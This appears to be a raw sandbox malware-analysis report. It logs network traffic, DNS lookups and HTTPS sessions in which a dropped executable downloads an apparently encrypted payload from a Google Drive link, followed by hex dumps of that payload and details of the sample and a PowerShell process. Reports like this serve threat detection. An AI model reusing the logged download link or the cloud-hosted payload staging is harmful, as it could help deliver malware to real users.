Jan 11, 2025 05:01:02.117185116 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.117223978 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.117233038 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.117266893 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.118937016 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.118983984 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.118992090 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.119024992 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.119605064 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.119643927 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.120448112 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.120491982 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.121869087 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.121934891 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.121947050 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.121988058 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.122845888 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.122891903 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.122899055 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.122936964 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.124149084 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.124198914 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.124207973 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.124243021 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.125577927 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.125628948 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.125709057 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.125747919 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.127346039 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.127399921 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.127402067 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.127413988 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.127435923 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.127470970 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.128746986 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.128797054 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.128809929 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.128849983 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.129754066 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.129802942 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.129810095 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.129841089 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.131424904 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.131475925 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.131483078 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.131514072 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.132472992 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.132524014 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.133295059 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.133343935 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.135590076 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.135648012 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.135654926 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.135687113 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.137797117 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.137845993 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.137958050 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.137990952 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.138123989 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.138163090 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.138168097 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.138200045 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.141289949 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.141345978 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.141355038 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.141388893 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.141410112 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.141454935 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.141460896 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.141499043 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.141588926 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.141633034 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.148396969 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.148473024 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.148488998 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.148523092 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.148529053 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.148559093 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.148564100 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.148585081 CET	443	49971	216.58.206.33	192.168.2.7
Jan 11, 2025 05:01:02.148597956 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.148631096 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.148679972 CET	49971	443	192.168.2.7	216.58.206.33
Jan 11, 2025 05:01:02.148698092 CET	443	49971	216.58.206.33	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 05:00:57.088383913 CET	51507	53	192.168.2.7	1.1.1.1
Jan 11, 2025 05:00:57.095376015 CET	53	51507	1.1.1.1	192.168.2.7
Jan 11, 2025 05:00:58.204476118 CET	52775	53	192.168.2.7	1.1.1.1
Jan 11, 2025 05:00:58.211560965 CET	53	52775	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 05:00:57.088383913 CET	192.168.2.7	1.1.1.1	0xce90	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:00:58.204476118 CET	192.168.2.7	1.1.1.1	0x36f7	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 05:00:57.095376015 CET	1.1.1.1	192.168.2.7	0xce90	No error (0)	drive.google.com		172.217.16.142	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:00:58.211560965 CET	1.1.1.1	192.168.2.7	0x36f7	No error (0)	drive.usercontent.google.com		216.58.206.33	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49970	172.217.16.142	443	7500	C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:00:57 UTC	216	OUT	GET /uc?export=download&id=1WI8d-93Y_QSTGiNvKis3dppTyPmetWD4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2025-01-11 04:00:58 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:00:58 GMT Location: https://drive.usercontent.google.com/download?id=1WI8d-93Y_QSTGiNvKis3dppTyPmetWD4&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-YKAKO2Wl3GtJUzTRTdQSLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49971	216.58.206.33	443	7500	C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:00:59 UTC	258	OUT	GET /download?id=1WI8d-93Y_QSTGiNvKis3dppTyPmetWD4&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-11 04:01:01 UTC	4934	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFIdbgSR3G3eEIVDMFqK9q11-fVa--Emu10_cyYUg8loUvEk7B7F-UgdllzxwzVrpSJAv6NT Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="fNpTySGqot204.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 287808 Last-Modified: Mon, 02 Dec 2024 09:16:47 GMT Date: Sat, 11 Jan 2025 04:01:01 GMT Expires: Sat, 11 Jan 2025 04:01:01 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=Xjoqyg== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-11 04:01:01 UTC	4934	IN	Data Raw: 23 04 1e 9d 44 c9 de 0e 1d 43 49 23 ff c9 4b bd b1 d5 e4 41 93 81 98 50 40 0e af 45 f0 d5 fa 3f c7 b3 80 06 25 47 5b e8 3c 21 fc a8 00 0f 39 10 c0 7e 56 90 4c 9b e0 80 e3 0b ba d8 59 83 6c 84 a1 fb aa 89 b6 2f 98 5a b2 d7 8c 43 46 07 a9 5a ad 99 cd a5 c6 d5 38 c2 8a 1e 56 da a6 e8 6e a0 d4 55 0f 28 01 4c 7a cd 2c a1 ff e1 3e 03 c0 d1 62 74 c1 5b 85 c0 65 9d e0 33 4b 39 c7 fd 49 67 d4 b7 a3 d6 f0 e7 9f 46 20 f4 c7 4d 51 96 c3 1e 70 9f f9 c9 07 57 4e 6f 62 89 e4 d6 fc 60 35 af ac 87 d6 d7 2e 7a 62 63 22 51 44 38 ba e2 13 07 00 f5 a3 21 0a 8f 57 59 c7 85 70 71 a9 38 9b 7a 4f 9f a3 d4 70 70 59 34 30 de cf 04 e7 5c d2 69 d0 df 08 7e 44 78 91 fc f7 87 d0 94 7a d9 12 76 f1 74 be 29 c8 f0 ef e3 aa 8c c8 96 ef cd 00 3f 5c 40 e1 69 ea 44 47 71 c9 d6 2a 62 fc aa 20 Data Ascii: #DCI#KAP@E?%G[<!9~VLYl/ZCFZ8VnU(Lz,>bt[e3K9IgF MQpWNob`5.zbc"QD8!WYpq8zOppY40\i~Dxzvt)?\@iDGq*b
2025-01-11 04:01:01 UTC	4829	IN	Data Raw: 8c f5 76 68 3a 0e 26 ce 7a 2a 25 fd 48 83 a2 81 7d a8 7d 1e cd ef 54 14 8c ed dd e3 a9 f6 a4 03 c2 a3 c1 12 3f ea fd 9d 43 35 26 42 75 ee d1 d4 2c 1b 57 60 fb db f1 5a cc c7 9a c0 ff 93 04 44 07 86 2c f4 af 2d 04 6e 7f e2 a1 f9 37 61 31 45 d7 1c eb d5 62 eb 22 19 65 9a 85 3b 26 06 d6 f1 2f c5 06 0a a0 4a 85 0e c2 bb 07 8d ae e4 51 72 3f d4 11 a1 75 40 6f 79 1e 33 29 f7 b9 2a 95 6c 7d 65 d4 be ac fd df df bc c6 83 d9 44 06 5b 89 ee 62 24 e5 bd f5 37 e9 dc 05 fd c4 0e f0 65 40 53 c7 2d 55 88 94 41 e7 6b 85 71 79 14 8b 81 4d d1 66 19 ed ea 1f f3 bf 9f 04 fb a3 55 42 df 96 cf 7c de 1c 22 01 63 03 04 5b 73 05 50 17 3d 30 64 b6 43 01 dc 59 3b a6 8e 2f 45 ef 39 bc 6a 5c 83 9d 65 56 84 97 2f 28 94 3e 0c 1e 7b 8a 88 d4 a7 38 80 86 33 4d 88 75 28 a8 f4 b7 d9 f9 b1 Data Ascii: vh:&z%H}}T?C5&Bu,W`ZD,-n7a1Eb"e;&/JQr?u@oy3)l}eD[b$7e@S-UAkqyMfUB\|"c[sP=0dCY;/E9j\eV/(>{83Mu(
2025-01-11 04:01:01 UTC	1324	IN	Data Raw: de 4a 70 3d bf 83 61 05 1e 89 b5 2f 98 19 0e b0 ea 25 df 0f 42 8b ef 12 0f 64 2e ca 3b 00 41 d5 db de 26 c3 a6 d5 d7 d6 cc 2a 80 b7 d0 f5 2c a1 83 3a 61 5d f3 11 39 ff 24 06 46 4b 20 61 bf 6d 10 b2 9a a0 8a ec 8f a4 9c 0a 84 b5 1d ca 19 c9 06 75 43 09 da 76 19 ec 32 ba f8 71 29 5e 82 1f 35 f1 9d 0e 27 37 e3 65 c0 af b6 28 5a 0d 02 03 d4 17 b2 53 08 52 95 11 ce cf 65 9a df 93 96 58 2f 2f f2 b3 7e 27 f5 c1 f4 ff 8c 4b b5 22 50 7d f6 e3 38 6f d1 ac ea 88 1d 40 c9 45 c7 5a 66 cd f9 8b 36 ef 22 0e 96 da d2 9f 64 fe 38 c7 40 22 ee 6a 05 b6 9b b2 9b 05 79 ae d1 7f 7c b6 dc 0f 11 9e ce 78 e6 ff 92 1d 5a c9 6e 51 36 28 32 8e ff bb 2c 8d a1 7c 98 2a 59 49 ed b5 3c af 91 8b 1c 65 1e a2 c4 c7 8b 72 42 d5 9b ad 0d 70 15 bd f3 37 ca e4 c3 de a5 8e e0 04 ce 16 f5 b3 a7 Data Ascii: Jp=a/%Bd.;A&,:a]9$FK amuCv2q)^5'7e(ZSReX//~'K"P}8o@EZf6"d8@"jy\|xZnQ6(2,\|YI<erBp7
2025-01-11 04:01:01 UTC	1390	IN	Data Raw: 9a 17 91 37 61 8f ca fc 26 34 ef a4 60 b6 ec d2 5f ac f7 38 b9 27 d6 52 23 1d c4 47 7b 56 8e c3 d2 a3 fd 63 b4 33 9d 4f 6f 08 4f a7 56 b3 05 e1 33 c4 91 d5 46 ed 46 c9 fc a5 c9 31 ed 35 c6 ee 0c 12 c6 97 26 f0 5f 0d 66 18 bf bf ac 12 57 bd ce b3 5d c5 83 83 3a d1 45 9e 41 65 38 a8 f4 24 d3 55 f1 9c 52 cc 3e 07 74 66 28 31 05 48 28 7a 14 fd 07 36 bd 34 19 67 45 28 c6 74 c1 3d b7 a8 fc d5 80 43 2c 03 c8 ad f5 03 bc ff 3e fd 7d eb 52 9f 88 fb ba 38 bc e2 5b 30 71 d6 21 23 81 aa 98 3d 6b db aa 71 68 1a d1 83 0e 81 b4 f4 fd fe 8d 64 84 e2 bc b1 58 e1 f5 87 96 5e 0b 8e 90 b3 9e 65 b2 55 ea fc 89 fe 00 3d 95 6f 7c b2 10 7e 80 95 a5 87 6c 75 d3 e5 aa 3e ef b8 22 bd 43 cf ca 16 9c b1 a3 85 64 34 c3 aa 6b 0d 14 58 d7 89 45 7e 8d 71 c2 58 de 9b 47 4c 04 db b0 c7 17 Data Ascii: 7a&4`_8'R#G{Vc3OoOV3FF15&_fW]:EAe8$UR>tf(1H(z64gE(t=C,>}R8[0q!#=kqhdX^eU=o\|~lu>"Cd4kXE~qXGL
2025-01-11 04:01:01 UTC	1390	IN	Data Raw: 85 c3 ed 65 d4 ec 65 fb 22 e8 97 5a 25 6e 4b a5 59 cf 4c 34 6b 46 76 5f 31 c9 27 eb 3b 43 15 39 86 ce f7 cc 53 8c f9 29 5c b7 6b 62 cb f0 60 3d 90 df 74 33 ef ab 1a 6c 45 a0 b9 37 50 ce 00 64 89 f3 8d 65 1e 7c 9c 08 db 84 b2 c3 61 0f 5b 17 8f 7f 86 a8 4b bc 21 4d 12 51 3a 82 4b cf cd 58 e2 55 b3 b7 4a 0c 63 a5 da 06 57 8a be e7 d3 85 04 c2 02 67 d1 bf 72 ac 00 0e 58 76 27 16 09 63 7c 81 18 4a 07 da b3 56 85 bf a8 55 01 3c ad 78 f3 6d b7 d2 29 6f 88 f4 35 ce 1c 20 c1 b7 2b d8 be 8b 97 53 c4 bf 19 0b e1 15 74 ca 45 4a 4e 56 d4 75 15 ef aa 8b 4f 37 51 d8 aa 12 ff d6 ed d2 38 a7 38 9f 24 4d d6 56 04 95 4b 86 32 35 65 b4 57 df 82 7e ef 80 7b fe 8b 88 dd c9 fb 2c 18 0e 43 19 8e 18 cb 01 db 3a 1f 7b 41 8b 83 e5 d8 ba 5d a2 94 a7 ba 59 46 5c cc b5 10 42 b0 64 ae Data Ascii: ee"Z%nKYL4kFv_1';C9S)\kb`=t3lE7Pde\|a[K!MQ:KXUJcWgrXv'c\|JVU<xm)o5 +StEJNVuO7Q88$MVK25eW~{,C:{A]YF\Bd
2025-01-11 04:01:01 UTC	1390	IN	Data Raw: bb 4d e7 43 dd 4e de dd 73 de 03 80 49 21 fa ac 86 8c 5f 98 b0 27 79 37 99 90 e7 3b 98 47 49 51 57 5d 59 2a 14 9b 6a 78 95 78 9f 78 4e 6d be f5 03 c5 99 b5 bf e3 6f 64 14 45 d6 bd 8a ad 77 a5 a0 fe a3 25 51 7b d4 92 24 73 e0 01 f5 21 6d 52 e3 78 b4 70 b6 33 15 75 92 a5 5f db 52 01 0c 9b 0f f2 99 2d e1 b2 0e 6c 4e a4 10 50 6e 68 d4 0d cc ce d6 43 7c 88 f5 d8 e8 84 7b b1 f1 74 f9 ca a6 83 0a 5b 42 46 c2 d7 c6 57 2e 86 f7 e4 14 30 9b 95 06 4c 8b 16 4a 1d 50 16 47 57 a3 c3 99 43 75 73 de 97 e6 27 cf 8f eb 7e 02 b8 19 47 7f 01 b0 24 18 7d 7f af 5e 1b b2 da a5 2f b8 ca e4 05 0e 03 88 cb a6 8f 26 92 41 c5 5e 42 9d 7e 0d 24 cd a3 6b 9f 10 4f d5 7a fd d9 a0 8b 9e 76 2d 73 16 fb bd e1 3b 9a 27 95 59 c9 26 f6 d7 0f 5d 96 35 4d 0a 16 9c f4 7c f7 5d 96 f6 11 a5 9f 39 Data Ascii: MCNsI!_'y7;GIQW]Y*jxxxNmodEw%Q{$s!mRxp3u_R-lNPnhC\|{t[BFW.0LJPGWCus'~G$}^/&A^B~$kOzv-s;'Y&]5M\|]9
2025-01-11 04:01:01 UTC	1390	IN	Data Raw: 6d ac 94 70 da e5 ac c1 2f ff f8 b4 07 a2 02 86 f4 43 0d 52 04 72 1b 96 d9 77 df 3d aa 61 30 e9 b8 b0 3c c3 9f 08 95 a7 29 e3 22 29 43 ff f5 86 e2 d7 f4 57 b0 65 77 fc 60 9c ed 3d 36 72 4c 0a ad 09 66 02 b2 d9 9f e3 05 d0 41 b1 24 82 fe 37 4a cd 00 29 33 fe 18 3d 55 ca 7e 0f 4f 3a e9 11 1a a3 5b 2f 95 1a 0b ae 49 f5 4f ec ad a9 80 14 79 ba 1a dc a3 36 fe 9d 4a fc 30 80 03 b2 22 aa 6e da e8 b4 13 54 df c9 52 3f 9b 7c 36 d1 fa 0d 21 2d de 33 40 20 61 77 9e 51 89 a6 13 d9 1f b5 02 d3 4e c2 71 65 37 64 13 7b 7c c5 6c fe de 3e 32 84 a9 28 71 ab 30 b9 46 e4 35 48 07 ae 2d c0 06 84 52 bc fc 48 9e 2b 8c 1e a0 40 86 11 2b 02 c5 8e 1c a1 58 ff 5c b2 85 55 f5 cb 23 01 d5 af ea 61 be e6 3f 9e 25 9d 7e cf 03 85 0e b4 a4 79 e5 c8 2b af 22 63 78 dc 89 14 3c 81 ea 75 d7 Data Ascii: mp/CRrw=a0<)")CWew`=6rLfA$7J)3=U~O:[/IOy6J0"nTR?\|6!-3@ awQNqe7d{\|l>2(q0F5H-RH+@+X\U#a?%~y+"cx<u
2025-01-11 04:01:01 UTC	1390	IN	Data Raw: 79 f7 ab 4d 9f 58 6e fe e4 2c bf 48 84 53 21 70 7b ab 4e 5c a4 ce b2 6a bb 14 36 fc d2 97 a3 16 20 8d de ec e2 aa 01 8a 41 fb 5c 53 40 0e 8b 27 a0 23 60 0b 6c 9c ab 7f b9 f3 a6 a2 da 5d 04 bf 79 47 67 0d a3 74 41 67 45 c6 81 71 b4 8e c3 3a 21 98 a4 ae 30 84 2b ec 59 4a 0e a5 c1 aa ec 3a bb 56 bd e7 88 d9 4b b1 69 f3 52 d6 0a 32 57 4b 45 8f ee af 18 df 1a 9c f0 46 fb 7e 9c d5 13 06 d4 40 fc 32 53 ff ae ae 0d 22 de 91 b7 e7 c5 f1 78 bf 6d f6 78 bd 0e ab 04 77 6e 32 4f 16 6d 15 ee 1c d0 81 83 e2 31 f7 03 3f fd f1 9c 37 7f 9f 82 96 22 35 5b 3b 6d 35 fb 80 f5 0e d9 12 2e de 92 3a 80 70 bf de 5a f5 ed 21 1a b4 f1 1a 99 d2 65 30 04 56 6f bc ee a9 6e fc cc 32 24 9e 39 e4 fe 7e 66 68 e1 70 bf 22 df 32 91 7d 43 50 a2 c6 c2 60 86 50 55 2b a7 f7 12 ea f3 ae 85 0d 52 Data Ascii: yMXn,HS!p{N\j6 A\S@'#`l]yGgtAgEq:!0+YJ:VKiR2WKEF~@2S"xmxwn2Om1?7"5[;m5.:pZ!e0Von2$9~fhp"2}CP`PU+R
2025-01-11 04:01:01 UTC	1390	IN	Data Raw: d6 12 24 d6 7f 1f 91 3a 92 bf fc 66 e0 74 f7 49 7d 39 16 ad 1c fc 99 c4 bf 85 ca 10 32 96 f1 07 e3 30 ab 63 0e fe 15 c9 22 c5 04 8d 98 88 d5 5e be 26 8d 1d c2 e7 ac 15 7c 4c 57 8e b0 90 c4 82 e5 5f 8f ea 49 93 89 e3 de d6 a3 3b 9a b1 90 bb 2b 4a b9 bc 40 a7 e7 57 61 51 65 3a c0 2c 6b ee 51 2c d2 db ad 6f 81 03 5a 7e d7 e7 83 8f 4f 19 ce cf 77 67 20 23 43 e2 28 6a cb eb 00 bd 7b 1c 75 b3 c2 a3 a2 9d 98 92 bd 43 8d 54 06 01 ea e2 a7 e6 35 23 b3 4a 21 e2 0c 93 2b 96 48 f9 f8 4a fa f5 1c d9 06 1c 8d 60 2b a1 1b 42 71 3b 9c 14 2c 06 27 3f 42 8a df 8c 14 f1 3d 2c ea 52 10 3c 4c 7a e1 1e 41 3c 1d 72 e8 51 92 54 9d fc f4 2c 8a 96 e6 d0 03 8b 3d da 44 29 59 24 8c 62 60 ea 03 9e ae 34 b3 4a 57 ed 90 9b dd 23 fe c4 8e 53 c1 c1 b9 85 ef 91 14 2d 7c 3e fd 70 5f d0 18 Data Ascii: $:ftI}920c"^&\|LW_I;+J@WaQe:,kQ,oZ~Owg #C(j{uCT5#J!+HJ`+Bq;,'?B=,R<LzA<rQT,=D)Y$b`4JW#S-\|>p_
2025-01-11 04:01:01 UTC	1390	IN	Data Raw: e9 a7 64 7e ff 7f e9 f7 fd 61 b6 2b 0a 5b 19 68 ad f0 a9 7c f6 e4 82 4a 4f e5 93 f1 05 17 de 69 b5 da 56 8c fc 47 34 64 80 d9 02 72 94 c0 76 90 ef 1d 46 ca 4f 40 a4 a4 7a f6 77 51 33 6f f0 3b 14 36 20 40 d8 73 cc 86 83 9f b2 5e 78 4d f2 c6 59 c2 4a da 7a 0a 23 d7 90 da 40 e1 5b 8c 99 30 f7 81 65 29 d1 f0 dd 26 76 e5 fe fc 31 39 75 21 54 22 2d 8d ed bc 46 ce 89 6d 28 c0 fe 53 0c ba 98 0a df 83 17 ef 2b ef 08 9a dd 7d 0d 73 39 af 4d 7f 75 1e 63 86 04 cb e3 38 ba 71 bc da 40 9d 58 90 80 ac 22 1e 2c 2e f2 70 20 51 53 28 57 32 b6 cb 92 33 fe bd 18 02 81 1f 3e 45 cc 52 78 49 a3 56 e9 34 b3 b1 df af e6 ad 3e ef e6 42 1b 5b 67 34 b7 6a b7 7d 10 ea 06 cd ff ee ce 01 75 b8 53 a6 c1 13 ed aa 83 34 9b d2 f9 46 e4 13 1f 08 7d f1 69 59 42 9a 5d 0e c4 a1 54 59 11 d0 54 Data Ascii: d~a+[h\|JOiVG4drvFO@zwQ3o;6 @s^xMYJz#@[0e)&v19u!T"-Fm(S+}s9Muc8q@X",.p QS(W23>ERxIV4>B[g4j}uS4F}iYB]TYT

Target ID:	0
Start time:	22:59:43
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\iwEnYIOol8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\iwEnYIOol8.exe"
Imagebase:	0x400000
File size:	720'350 bytes
MD5 hash:	C759322828B728B406066F7D04170334
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	22:59:43
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
